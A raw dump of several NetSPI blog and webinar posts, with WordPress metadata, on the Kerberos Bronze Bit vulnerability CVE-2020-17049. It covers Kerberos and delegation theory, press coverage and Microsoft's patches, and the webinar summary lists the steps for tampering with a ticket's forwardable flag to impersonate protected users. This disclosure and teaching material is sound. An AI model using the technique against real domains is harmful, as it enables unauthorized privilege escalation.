In December 2020, another Kerberos authentication vulnerability was made public, the Kerberos Bronze Bit Attack(CVE-2020-17049). Jake Karnes, Managing Consultant at NetSPI revealed his research after Microsoft released a patch to fix it. The Kerberos Bronze Bit attack was named in the spirit of the widely known Golden Ticket and Silver Ticketattacks and exists in the way the Key Distribution Center handles service tickets and determines whether or not they can be used for delegation.

Let’s start with some Kerberos fundamentals. In general terms, delegation refers to the ability of a service account to act on behalf of a user account to access resources with the access privileges of the latter. The most common example is a web application impersonating a user when it accesses a backend database and retrieves some data under the user’s authority.

Microsoft offers two types of delegation: without restrictions, known as Unconstrained Delegation, and restricted to only certain services, which comes in two flavors: Constrained Delegation and Resource-Based Constrained Delegation. The Kerberos protocol, by itself, doesn’t have the ability to restrict delegation to a specific group of services. For this reason, Microsoft implemented two extensions that allow achieving this behavior:  Service for User to Self (S4U2self) and Service for User to Proxy (S4U2proxy).

The Bronze Bit Attack uses both protocols. First, it obtains a service ticket for a targeted user to a compromised service via S4U2self. Then, it tampers this service ticket modifying the forwardable flag. With this tampered ticket, it uses S4U2proxy to obtain a service ticket for the targeted user to the targeted service. Finally, with the last service ticket, the attacker can impersonate the targeted user.

So, surely you are wondering why is this possible? The answer: the forwardable flag is only protected by encrypting the service ticket with the first service’s password hash. If an attacker manages to compromise this service, it’s game over (unless you’re patched). They will be able to decrypt the ticket and flip the flag bit.

@jakekarnes42 used Impacket for the attack implementation and opened the pull request (PR) #1013 that added a new force-forwardable flag to getST.py. Thanks Jake, for using Impacket for this great implementation of the attack!

If you are interested in knowing more details about this, you can check this great series of posts from Jake here: overview, theory and exploitation.

 

Read the full article here: https://www.secureauth.com/blog/now-available-impacket-release-v0-9-23/

 

[post_title] => SecureAuth: Impacket Release v0.9.23 [post_excerpt] => On June 9, 2021, NetSPI Security Consultant Jake Karnes was featured in a SecureAuth article. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => secureauth-impacket-release-v0-9-23 [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:50:49 [post_modified_gmt] => 2022-12-16 16:50:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25556 [menu_order] => 395 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 21082 [post_author] => 53 [post_date] => 2020-12-24 07:00:05 [post_date_gmt] => 2020-12-24 07:00:05 [post_content] =>
Watch Now

Overview

In this presentation, NetSPI’s Senior Technical Architect Jake Karnes explains the inner workings of CVE-2020-17049: The Kerberos Bronze Bit Attack. Jake discovered this vulnerability and responsibly disclosed it to Microsoft which provided patches in November and December of 2020. Once the patches became available, Jake shared the exploit which allows an attacker to bypass security features and escalate privileges within an Active Directory domain. 

The presentation provides an introduction to the Kerberos protocol and Microsoft’s use of Kerberos Delegation. If a better understanding of Kerberos has been on your “to-do” list, here’s a great opportunity to dive in and learn more. After covering Kerberos, the vulnerability and its exploit are explained, including its potential impact in a compromised environment. The presentation also includes a demonstration of the exploit in action. In the demonstration, we see how an attacker can escalate privileges from a compromised user account to gain access to additional sensitive systems. 

Key highlights:

The Kerberos protocol  

To get started, having a high-level understanding of the Kerberos protocol is important.

Here’s a brief overview: 

  • The Kerberos protocol is a ticket-based authentication protocol, which means it's used to prove users are who they say they are to other entities in their environment. For example, if a user wants to connect to a service, like a file share, or a database or a web application, they can use Kerberos to authenticate themselves.  
  • The protocol was originally developed at MIT and for the purpose of this webinar, we’re going to focus on how it’s used in a Windows environment.  
  • Kerberos uses symmetric key cryptography to avoid risks associated with private and public keys. Each user has their own secret key and diagram, making it easy to see how the user has their red secret key and the service has its own secret key in green. The secret key is the entity's password hash and because each user is the only one with their password, they should be the only one able to make that hash. In other words, if a user has the secret, they can prove their identity. 
  • Kerberos has a central authority called the key distribution center (KDC). In a Windows environment, this is the domain controller. The KDC also holds a copy of everyone's secret key, along with its own secret key, the service’s green secret key and any other entities in the environment, it has a copy of their secret key as well. A user can prove to the KDC that they control the secret key. And if the KDC accepts this proof, it will return a ticket and these tickets are used as proof to authenticate themselves to other services. 

How a user proves their identity to the KDC

The next piece is understanding how a user proves their identity to the KDC to get the ticket. The name of this process is the authentication service exchange. Here’s how the process works:

  • The user authenticates themselves to the KDC 
  • An encrypted timestamp proves they have access to the secret key (their hashed password) 
  • If successful, the KDC returns with an AS_REP message granting the TGT 

Once a user is authenticated by the KDC, it’s easier to access other services within the environment, such as a file share or database through a ticket-granting service exchange. The steps in this process include:

  • User requests a ticket for a service from the KDC 
  • Encrypted timestamp proves they have access to the previously shared logon session key 
  • The TGT contains the logon session for the KDC (since the KDC doesn’t save it)  
  • If successful, the KDC returns with a TGS_REP message and produces a service ticket  

After the user receives the TGT and the service ticket, the third step in the process is the client/server exchange. The steps involved in this process are:  

  • User sends encrypted timestamp with service session key 
  • The service decrypts the service ticket using its long-term key (proving the service ticket came from the KDC) 
  • The service extracts the service session key and checks the encrypted timestamp 
  • The service checks the signature in the PAC with its long-term key  
    • This supplies the user’s authentication data upfront 
    • Optionally, the PAC is sent to the KDC to confirm its signature is valid too 
  • From there, authenticated communication can proceed 

Kerberos delegation 

The Kerberos protocol covers one user connecting to one service. But it gets more complicated when it comes to different services connecting to one another, such as a web application connecting to a database.  

For this type of connection, the Kerberos delegation is used. The delegation enables one service to impersonate a user when connecting to another server, meaning the service authenticates as a user and is authorized as a user. Using the web application example above, some ways this may be done include for a web application writing to a database or reading from a file share.  

Types of Kerberos delegation include:

  • Unconstrained delegation 
    • “Trust the computer for delegation to any service (Kerberos only)” 
    • The user’s TGT is embedded into the service ticket 
    • This type of delegation is not recommended and if you find it within your environment, it’s important to turn it off  
  • “Classic” constrained delegation 
    • While unconstrained delegation means this service can delegate authentication to any service, constrained delegation means this service can delegate authentication to only these services  
    • With protocol transition 
    • Without protocol transition 
  • Resource-based constrained delegation  

With constrained delegation, one service can get a ticket to another service impersonating a user in the S4U2Proxy exchange. Here are the steps in the process:

  • One service obtains a service ticket to another service as a user, without needing that user’s TGT 
  • The first service presents the user’s service ticket as evidence, along with the services’ own TGT 
  • This is done “without protocol transition” because it assumes the user authenticated to the first service using Kerberos 

If the user hasn’t authenticated to the first service in the first place, they can delegate authentication through the S4U2Self exchange. Here’s what this process looks like:

  • Obtains a service ticket to itself as a user, without needing that user’s service ticket 
  • Required when the user authenticates to the first service through another protocol  
    • NTLM v2 
  • Slight modification of the ticket-granting exchange 
  • With the newly obtained service ticket, the first service can perform the S4U2Proxy exchange 

Because it’s pretty powerful functionality to be able to get another service ticket on behalf of another user and protections are in place within constrained delegation. Protections include:

  • Allowing and disallowing protocol transition 
    • If you trust the service to perform the protocol transition, you trust it to impersonate users who never connected to the service  
    • “TrustedToAuthForDelegation” in Active Directory 
  • Protected users and sensitive accounts 
    • Accounts can be protected from delegation entirely 
    • Protected users groups  
    • “Account is sensitive and can’t be delegated” 
  • Enforcing constrained delegation lists 
    • It’s constrained delegation for a reason  

Here’s a simplified overview and recap of Kerberos delegation:

  • Service1 sends an authentication service request with a timestamp encrypted with Service1’s hash to obtain a TGT 
  • The KDC sends a ticket-granting ticket for Service1 
  • Service1 sends a S4U2Self request for the target user, sending Service1’s TGT 
  • Service user for the target user sent to Service1 by the KDC 
  • Service1 sends a S4U2Proxy request for the user for Service2, sending the service ticket 
  • KDC sends the service ticket as the target user for Service2 
  • Request is sent to Service2 using the service ticket to impersonate the target user 

The vulnerability and what it bypasses 

An example of a vulnerability in the Kerberos protocol is when the service ticket is encrypted with the service’s own key. All the protections can be bypassed because the service always has its own secret key.  

Here’s an overview of what the attack would look like:

  • The attacker sends an authentication service request with a timestamp encrypted with Service1’s hash to obtain a TGT 
  • The KDC sends a ticket-granting ticket for Service1 to the attacker 
  • The attackers sends a S4U2Self request for the target user, sending Service1’s TGT 
  • The KDC sends a non-forwardable service ticket for the target user to Service1 
  • The attacker decrypts the service ticket, sets the forwardable flag, and re-encrypts the service ticket 
  • The attacker then sends a S4U2Proxy request for the user for Service2, sending the modified service ticket 
  • The KDC observes that the ticket is forwardable and checks if there is a constrained delegation trust relationship between Service1 and Service2 and the check succeeds 
  • The KDC sends the service ticket as the target user for the victim service 
  • The attacker sends a request to the victim service to impersonate the target user 
  • The victim service processes the request under the protected user’s authorization  

In this type of attack, the protections bypassed include:

  • Bypassed TrustToAuthForDelegation 
    • Even if protocol transition is disallowed (i.e. Service1 is configured with “- Use Kerberos only”), they can still impersonate users 
    • No user needs to connect to Service1 to impersonate them  
  • Impersonating “protected” and “sensitive” users 
    • Any user in the domain can be impersonated  

Microsoft patches 

Microsoft has implemented several fixes for this Kerberos vulnerability, including:

  • November 10, 2020 
    • Microsoft publicly announces CVE-2020-17049 
    • Initial patch enables “ticket signatures” in the PAC 
  • December 8, 2020 
    • The “ticket signatures” patch ported to Windows Server 2008 SP2 and Windows Server 2008 R2 
    • NetSPI blogs published 
    • Exploitt published as addition to Impacket 
  • February 9, 2021 
    • “Enforcement mode” of ticket signatures is enabled 

Learn more about CVE-2020-17049: Kerberos Bronze Bit Attack 

If you’re interested in learning more about CVE-2020-17049: Kerberos Bronze Bit Attack, the risks associated, and how to protect your business, NetSPI has published several articles on the topic, linked below.

[wonderplugin_video iframe="https://youtu.be/dfJd7gOB8sE" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => CVE-2020-17049: Kerberos Bronze Bit Attack - Explained and Exploited [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cve-2020-17049-kerberos-bronze-bit-attack-explained-and-exploited [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:08:13 [post_modified_gmt] => 2023-09-01 12:08:13 [post_content_filtered] => [post_parent] => 0 [guid] => https://localhost/netspi/?post_type=webinars&p=21082 [menu_order] => 63 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 20705 [post_author] => 52 [post_date] => 2020-12-10 07:00:07 [post_date_gmt] => 2020-12-10 07:00:07 [post_content] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Bleeping Computer: Proof-of-concept exploit code and full details on a Windows Kerberos security bypass vulnerability have been published earlier this week by Jake Karnes, the NetSPI security consultant and penetration tester who reported the security bug to Microsoft. The security bug tracked as CVE-2020-17049 and patched by Microsoft during November 2020's Patch Tuesday can be exploited in what the researcher has named as Kerberos Bronze Bit attacks. Read the full article here: https://www.bleepingcomputer.com/news/security/windows-kerberos-bronze-bit-attack-gets-public-exploit-patch-now/ [post_title] => Bleeping Computer: Windows Kerberos Bronze Bit attack gets public exploit, patch now [post_excerpt] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Bleeping Computer. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => bleeping-computer-windows-kerberos-bronze-bit-attack-gets-public-exploit-patch-now [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:30:12 [post_modified_gmt] => 2021-04-14 05:30:12 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20705 [menu_order] => 440 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 20711 [post_author] => 52 [post_date] => 2020-12-10 07:00:06 [post_date_gmt] => 2020-12-10 07:00:06 [post_content] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Trimarc:

Jake Karnes (@jakekarnes42) with NetSPI published 3 articles (that’s right 3!) describing a new attack against Microsoft’s Kerberos implementation in Active Directory. He posted an Overview article, describing how the attack works, an Attack article on practical exploitation, and if you need further background on Kerberos, a Theory article.

This article attempts to summarize the key details of the attack and provide some expanded information and potential attack scenarios, including how Active Directory could be compromised leveraging this attack method.

Read the full article here: https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory [post_title] => Trimarc: Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory [post_excerpt] => On December 10, NetSPI Security Consultant Jake Karnes was featured in Trimarc. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => trimarc-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-potentially-compromise-active-directory [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:29:33 [post_modified_gmt] => 2021-04-14 05:29:33 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20711 [menu_order] => 439 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 20698 [post_author] => 52 [post_date] => 2020-12-10 07:00:05 [post_date_gmt] => 2020-12-10 07:00:05 [post_content] => On December 10, NetSPI Security Consultant Jake Karnes was featured in ZDNet: Proof-of-concept exploit code has been published this week for a new attack technique that can bypass the Kerberos authentication protocol in Windows environments and let intruders access sensitive network-connected services. Named the Bronze Bit attack, or CVE-2020-17049, patching this bug caused quite the issue for Microsoft already. The OS maker delivered an initial fix for Bronze Bit attacks in the November 2020 Patch Tuesday, but the patch caused authentication issues for Microsoft's customers, and a new update had to be deployed this month to fix the previous issues. On Wednesday, a day after Microsoft delivered the final patches, Jake Karnes, a security engineer at NetSPI, published a technical breakdown of the vulnerability so network defenders can understand how they are vulnerable and why they need to update, despite the patching process' rocky start. Read the full article here: https://www.zdnet.com/article/proof-of-concept-exploit-code-published-for-new-kerberos-bronze-bit-attack/ [post_title] => ZDNet: Proof-of-concept exploit code published for new Kerberos Bronze Bit attack [post_excerpt] => On December 10, NetSPI Security Consultant Jake Karnes was featured in ZDNet. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => zdnet-proof-of-concept-exploit-code-published-for-new-kerberos-bronze-bit-attack [to_ping] => [pinged] => [post_modified] => 2021-04-14 05:30:19 [post_modified_gmt] => 2021-04-14 05:30:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=20698 [menu_order] => 441 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 11799 [post_author] => 52 [post_date] => 2020-12-08 07:00:48 [post_date_gmt] => 2020-12-08 07:00:48 [post_content] =>

Introduction and Background

This attack expands upon the excellent research documented by Elad Shamir in “Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory.” I’ll cover the key points below, but his article a great resource and primer for Kerberos and constrained delegation in AD.

If you’re already familiar with the Kerberos fundamentals, feel free to skip to the Kerberos Delegation section. And if you already have a good grasp on delegation (or read the article linked above), you can jump straight into the vulnerability here. If you want to skip this background knowledge entirely and jump straight into the exploit, please see my CVE-2020-17049: Kerberos Bronze Bit Attack - Practical Exploitation post.

I’ll acknowledge upfront that Kerberos is a complex protocol with many extensions, options and details. Of course, all of these are very important when discussing a security system but they cannot all be captured in a blog post. The explanations below provide a simplified view of Kerberos and Active Directory, focusing on the key points to understand the discovered weakness and its exploit.

Kerberos 101

Kerberos is a protocol used in Windows Active Directory to authenticate users, servers and other resource to each other within a domain. Kerberos is based on symmetric key cryptography where each principal has a long-term secret key. This secret key is only known by the principal themselves and the Key Distribution Center (KDC). In an AD environment, the domain controller performs the role of the KDC. In the illustration below, we can see the KDC has a copy of the user’s key, the service’s key, and its own key.

Kerberos Participants

With its knowledge of each principal’s secret key, the KDC facilitates authentication of one principal to another by issuing “tickets.” These tickets contain metadata, authorization information and additional secret keys which can be used with future tickets. Let’s explore how these tickets are created and used by principals to authenticate to each other.

Authentication Service Exchange

Before principals can authenticate to each other, they must authenticate themselves to the KDC. Let’s take look at the process of a user authenticating themselves to the KDC through the “Authentication Service Exchange.”

As Exchange Complete E

The user derives their secret key by hashing their password. The secret key is used to encrypt a timestamp, which is sent to the KDC along with their username. Based on the username, the KDC gets its copy of the secret key for that user. The KDC then decrypts the timestamp. If the decryption is successful, this proves that the user has access to the secret key. If the timestamp were encrypted with any other key, it wouldn’t decrypt successfully with the user’s key. And if the timestamp is recent, it proves that this isn’t a replay attack (i.e. the user isn’t sending some old, captured encrypted timestamp). If the user is using a smartcard or Windows Hello for Business instead of a password, the user and KDC will establish key agreement via ephemeral Diffie-Hellman instead of the encrypted timestamp, but the rest of the Kerberos process will remain the same.

As Rep

Once the checks pass, the KDC will create a new random logon session key, and send back an “AS_REP” reply. This AS_REP is a pretty complex data structure, so let’s consider a simplified representation:

The “cname” field contains the username in plaintext. The rest of the data is split into two halves, each encrypted with a different key. The first “enc-part” section of the response is encrypted with the user’s secret key. Only the user themselves can read these contents. It contains some metadata (such as “flags” and “sname” fields), and the logon session key that the KDC generated.

The last section is called the “Ticket-Granting Ticket” or TGT. This is encrypted with the KDC’s secret key which means the user cannot read the contents of this section.

The user can extract the logon session key from the readable “enc-part” and the TGT from the AS_REP, and save these in their key cache for later user. The TGT can now serve as evidence that this user has already been authenticated by the KDC. I like to think of the TGT like the stamp you get on your hand when leaving an amusement park. The fact that your hand is stamped shows you were already allowed to be inside, so they’ll let you back in without buying another pass.

The TGT is a very powerful authentication artifact which enables the user to prove their identity and obtain access to other services within the domain. If an attacker had access to the KDC’s secret key, they could forge these tickets to impersonate any user to any other service. This is known as a Golden Ticket attack discovered by Benjamin Delpy.

Ticket-Granting Service Exchange

Tgs Exchange Complete

After obtaining the logon session key and TGT, the user can now obtain tickets for other specific services through the Ticket-Granting Exchange:

The user begins by encrypting another timestamp, but now using the logon session key rather than their secret key. This encrypted timestamp is sent to the KDC, along with the TGT and which service the user is requesting a ticket for. The KDC decrypts the TGT using its secret key and extracts the logon session key. The KDC then confirms the user’s encrypted timestamp using the logon session key and, if the checks pass, will generate a new random service session key. The KDC sends back a “TGS_REP” reply and the exchange is complete.

Let’s inspect that TGS_REP data structure as we did before:

Tgs Rep

The data structure is the same as the AS_REP, with some important differences in the values. The “enc-part” is now encrypted with the logon session key and contains the new service session key. The user can decrypt the “enc-part” using the logon session key from the key cache, extract the service session key and save it alongside the service ticket in the key cache.

The service ticket is encrypted with the service’s long-term secret key and therefore can only be read by the service and KDC who have the service’s secret key, not the user. You’ll notice that its structure looks the same as the TGT, and that’s no accident. The TGT is just a service ticket to the KDC's Ticket Granting Service. Let’s take a closer look at those parts within the service ticket:

  • Session key: The service session key generated by the KDC which will be shared by both the user and the service.
  • Flags: A collection of binary values (only 0 or 1) which provide metadata for the ticket. The “Forwardable” flag is one of several available flags and will be discussed in detail later.
  • “cname”: The client name (i.e. an identifier for the user associated with this service ticket).
  • PAC: The user’s authorization data in a structure known as the privilege attribute certificate or PAC. This contains additional user metadata such as their group memberships. The PAC contains two cryptographic signatures. One signature created with the service’s key and the other created with the KDC’s key. Because of these dual signatures, the PAC is effectively tamper-proof.

It's also worth noting that the "sname" field (which identifies the service's name) is not in the encrypted service ticket. This allows for interesting sname substitution attacks as first described by Alberto Solino.

Client/Server Exchange

With a service ticket and a service session key, the user is finally ready to authenticate to the service.

Krb Ap Req Complete E

I think we can see the familiar pattern here. A timestamp is encrypted with the service session key, and sent from the user to the service along with the service ticket. The service decrypts the ticket with its long-term key. This proves the ticket came from the KDC, since only the KDC and the service itself should have the long-term key to create such a service ticket. The service session key is extracted from the service ticket and used to validate the timestamp.

The service will then use its long-term key to check the signature of the PAC. This provides the user’s authorization upfront, so the service doesn’t need to fetch it from the KDC. Optionally, the service may choose to send the PAC to the KDC, so that the KDC may validate the second signature against the KDC’s key. If performed, this optional check verifies that the PAC has not been altered from when it was first created by the KDC and helps prevent attempts to forge the PAC and escalate privileges.

Once these checks are performed and passed, the user has successfully authenticated to the service, the service is aware of the user’s authorization, and the user may proceed with any requests.

Like the TGT, if an attacker can forge a valid service ticket to a particular service, then it can impersonate any user and authenticate to that service. This is known as a “Silver Ticket” attack and requires knowledge of the service’s secret key. A popular technique for obtaining a service’s secret key is “Kerberoasting” discovered by Tim Medin. However, this attack is thwarted if the service performs the optional step of sending the PAC to the KDC. The KDC will observe that its signature for the PAC is incorrect (because the attacker doesn’t have the KDC’s secret key), and it will report that error back to the service which will reject the service ticket.

Kerberos Delegation

Now that we understand the fundamentals of how Kerberos authenticates a user to a service, consider the following: what if that service wants to send requests to another service on the user’s behalf? A common scenario would be when a user authenticates to a web application, and that web application needs to access a database under the user’s authority. The database controls whether a given user is allowed to access a particular record. When the web application attempts to access a database record, it must carry the user's authorization in the request to allow the database to determine if the request should be allowed or denied. This is sometimes referred to as the “double-hop” scenario.

For our examples going forward, “Service1” will be the service which the user is directly authenticated to, and “Service2” will be the additional service which needs to be accessed under the user’s authority.

Delegation

This problem is addressed through “Kerberos delegation” which allows Service1 to impersonate the user and interact with Service2 as if the requests came directly from the user. There are several types of Kerberos delegation supported in Active Directory which will be discussed in detail below:

The following screenshot captures where most of the delegation configuration lives in Active Directory:

Ad Delegation Edited

Unconstrained Delegation

Although the vulnerability doesn’t impact this configuration, unconstrained delegation should be avoided. Let’s consider that Service1 has been configured for unconstrained delegation with the “Trust this computer for delegation to any service (Kerberos only)” setting above. When a user obtains a service ticket to Service1, the KDC will embed the user’s TGT into the service ticket. When the service ticket is passed to Service1, the service can extract the TGT. With access to the user’s TGT, Service1 can perform the Ticket-Granting Service Exchange, and obtain service tickets as the user to any other service. This allows complete impersonation of the user.

Issues arising from unconstrained delegation are well-known and have been discussed thoroughly by Will Schroeder here and Sean Metcalf here. Since this is no longer recommended, may not even be supported, and not directly related to the vulnerability, I’ll refer you to those great resources for a deeper dive.

Constrained Delegation

Due to the potential issues with unconstrained delegation, Microsoft introduced the concept of “constrained delegation” in its Windows Server 2003 release, and published [MS-SFU]: Service for User and Constrained Delegation Protocol as a public specification and Kerberos extension in 2007. Unlike unconstrained delegation, the extension would allow for services’ delegation targets to be predefined. Using our running example, it could be configured that Service1 is only allowed to delegate to Service2, instead of every service in the domain. When the user obtains a service ticket for Service1, the KDC would no longer embed the user’s TGT into the service ticket.

Constrained Delegation without Protocol Transition

Let’s consider that a user has authenticated to Service1 through Kerberos, passing their service ticket, and now Service1 needs to access Service2 under the user’s authority. Because the user’s service ticket is specific to Service1, it would be rejected if passed directly to Service2. Without the user’s TGT, Service1 cannot obtain a service ticket to Service2 from the KDC. So how does the Service1 authenticate to Service2 as the user?

The MS-SFU specification solves this problem through the “Service for User to Proxy” (S4U2proxy) protocol. The S4U2proxy protocol allows Service1 to obtain a service ticket to Service2 as the user, by sending the KDC the service ticket it received from the user, along with Service1's own TGT. The KDC will reply with a "TGS_REP" including a service ticket which valid for Service2, authorized as the user. Once Service1 has a service ticket as the user to Service2, it can proceed with the same Client/Server exchange as before. After that exchange is complete, Service2 will process the requests from Service1 as if they came from the user themselves.

S U Proxyexchange Complete

The S4U2proxy protocol allows for constrained delegation “without protocol transition” because the Kerberos protocol is used for every step. All principals are authenticated to each other through Kerberos and its ticket exchanges.

Constrained Delegation with Protocol Transition

What if the user authenticated to Service1 by a protocol other than Kerberos? For example, Service1 may have authenticated the user through NTLM v2 Authentication. If Service1 then needed to delegate that authentication to Service2, it would be unable to do so. The user never presented a service ticket to Service1, so Service1 cannot pass that service ticket to the KDC in the S4U2proxy protocol. In this case, Service1 would need to perform a “protocol transition” using the second protocol provided in the MS-SFU specification: the “Service for User to Self” (S4U2self) protocol.

The S4U2self protocol allows a service to obtain a service ticket to itself on behalf of any user. The protocol is a modification of the Ticket-Granting Exchange. Service1 presents its own TGT and timestamp encrypted with its logon session key to the KDC and specifies which user it would like a ticket for. The KDC processes the request, performing the same validations as before, and returns a service ticket for Service1 which identifies the specified user as the client in the “cname” field.

S U Self Exchange Complete

Now that Service1 has obtained a service ticket to itself, it can present this ticket as evidence to in the S4U2proxy exchange and obtain a service ticket to Service2 on the user’s behalf.

It’s important to note that a service can obtain a service ticket to itself on behalf of any user through the S4U2self protocol. The service is not required to present any evidence that the user has actually authenticated to the service.

Resource-Based Constrained Delegation (RBCD)

When Microsoft first introduced the concept of Kerberos constrained delegation, it was only possible to define a list of services which a specified service could delegate to. For example, a domain admin could specify that ServiceA is allowed to delegate Kerberos authentication to ServiceB, ServiceC and ServiceD. The list of delegation targets would be configured in the “AllowedToDelegateTo” property of ServiceA in Active Directory.

Resource-based Constrained Delegation flips this model. Introduced in Windows Server 2012, RBCD lets a service define which other services it accepts delegated Kerberos authentication from. For example, a privileged user (not necessarily a domain admin) could specify that ServiceW accepts delegated Kerberos authentication from ServiceX, ServiceY and ServiceZ. This list would configured in the “PrincipalsAllowedToDelegateToAccount” property of ServiceW in Active Directory.

After the introduction of RBCD, the existing constrained delegation became unofficially known as “classic” constrained delegation.

Constraineddelegationcomparison

Protections Within Constrained Delegation

While the scope is more narrow than unconstrained delegation, constrained delegation still allows for the impersonation of users and therefore needs strong security controls to limit its potential impact if abused. Microsoft provides a variety of configuration options to balance security and functionality.

Allowing and Disallowing Protocol Transition

When using “classic” constrained delegation, the sysadmin must decide if the service is allowed to perform the “protocol transition” described previously. If so, the service will be permitted to impersonate users who haven’t already been authenticated through Kerberos. This trusts that the service will only impersonate users who it has authenticated through another mechanism.

If the service is trusted for constrained delegation with protocol transition, then the “TrustedToAuthForDelegation” property in Active Directory is enabled. This corresponds to the “Trust this computer for delegation to specified services only – Use any authentication protocol” option in the AD GUI.

If the service is trusted for constrained delegation without protocol transition, then the “TrustedToAuthForDelegation” property in Active Directory is not enabled but the AllowedToDelegateTo list is still populated with delegation targets.  This corresponds to the “Trust this computer for delegation to specified services only – Use Kerberos only” option in the AD GUI. This restriction is enforced by the S4U2self protocol. While any service can perform the S4U2self exchange to obtain a service ticket to itself as any user, if protocol transition is not allowed then the resulting service ticket will have its Forwardable flag set to 0. When a service ticket with a Forwardable flag of 0 is passed in the subsequent S4U2proxy exchange, the exchange will fail.

Effectively, “TrustedToAuthForDelegation” allows a service to use both the S4U2self and the S4U2proxy protocols successfully. If a service is not "TrustedToAuthForDelegation" but has a non-empty AllowedToDelegateTo list, then the service may use S4U2self successfully, but the service can only pass forwardable tickets to S4U2proxy. The service should only obtain forwardable tickets from users that have already authenticated through Kerberos with the KDC directly, preventing impersonation.

Protected Users and Sensitive Accounts

Services aren’t the only principals with security restrictions applied. Users and other AD accounts can be configured to disallow delegation of their authentication. This means that even if a service is allowed to perform delegation (of any kind), the service cannot delegate and impersonate the user. There are two ways of protecting an account from delegation.

First, a sysadmin can enable the “Account is sensitive and cannot be delegated” setting in Active Directory for the account. The screenshot below shows how this is displayed in the AD GUI.

Account Is Sensitive

The second option is to add the account to the “Protected Users” security group in AD. Any members of this group may not have their authentication delegated, and there are other protections as well.

Protected Users Group

Like the “Use Kerberos only” restriction discussed in the previous section, this protection is enforced by ensuring that all tickets issued for these users are not forwardable. When a ticket is created for a user with the “account is sensitive and cannot be delegated” setting, or if the user is a member of the “Protected Users” group, then the Forwardable flag value will always be 0. A service can still obtain a ticket for these users to itself through the S4U2self protocol, but since the ticket is not forwardable, it cannot be successfully used in the S4U2proxy protocol to obtain a ticket for another service.

Enforcing Constrained Delegation Lists

Of course, the KDC must also enforce the constrained delegation lists discussed previously. This is only applicable during the S4U2proxy protocol. Let’s return to our example of Service1 attempting to delegate authentication to Service2. During the S4U2proxy protocol, the KDC will confirm that Service2 is in Service1’s “AllowedToDelegateTo” list (allowing “classic” constrained delegation) or that Service1 is in Service2’s “PrincipalsAllowedToDelegateToAccount” list (allowing resource-based constrained delegation). If neither of those conditions are met, then the exchange fails. This prevents a service from performing constrained delegation to another, unless one of them have been explicitly configured for that.

The Big Picture

Now that we’ve covered the fundamentals of Kerberos, constrained delegation, and its protections, let’s bring all of this together. Let’s consider that Service1 wants to authenticate to Service2 as another user, but the user has not already authenticated to Service1 through Kerberos.

Service1 starts with the standard Authentication Service exchange. Like before, it encrypts a timestamp with its long-term secret key to prove its identity. The KDC validates the timestamp, returns a logon session key and a ticket-grant ticket (TGT) in an AS_REP response.

Kerberos Constrained Delegation Overview Complete

Service1 extracts the logon session key and TGT from the AS_REP, then continues to the S4U2self exchange. Service1 encrypts another timestamp with the logon session key. Service1 sends the encrypted timestamp, its TGT and the target user’s name to the KDC, requesting a ticket to itself through the S4U2self protocol. The KDC will validate the incoming TGT and timestamp. If this passes, the KDC prepares a service ticket for the specified user to Service1. Initially, the service ticket’s forwardable flag is set (i.e. Forwardable=1).

The KDC will check if Service1 has the “TrustedToAuthForDelegation” property set. If not, the service’s ticket forwardable flag is set to 0. The KDC will also check if the target user is protected from delegation. If the user is a member of the “Protected Users” group or configured with the “Account is sensitive and cannot be delegated” setting, then the forwardable flag in the service ticket is set to 0.

The KDC returns the new service ticket to Service1. Service1 now has a valid ticket as the user to itself, which may or may not be forwardable.

Kerberos Constrained Delegation Overview Complete

Service1 is now ready for the final step: the S4U2proxy Exchange. Service1 presents the service ticket it received back to the KDC as proof of the user’s authentication to Service1, and Service1 requests a new service ticket to Service2 as the user. The KDC begins by confirming that there is a delegation trust relationship between Service1 and Service2. It checks if Service2 is in Service1’s “AllowedToDelegateTo” list. If so, a classic constrained delegation trust relationship is confirmed. If not, the KDC checks if Service1 is in Service2’s “PrincipalsAllowedToDelegateToAccount” list. If so, a resource-based constrained delegation trust relationship exists. If both checks fail, the exchange fails with an error.

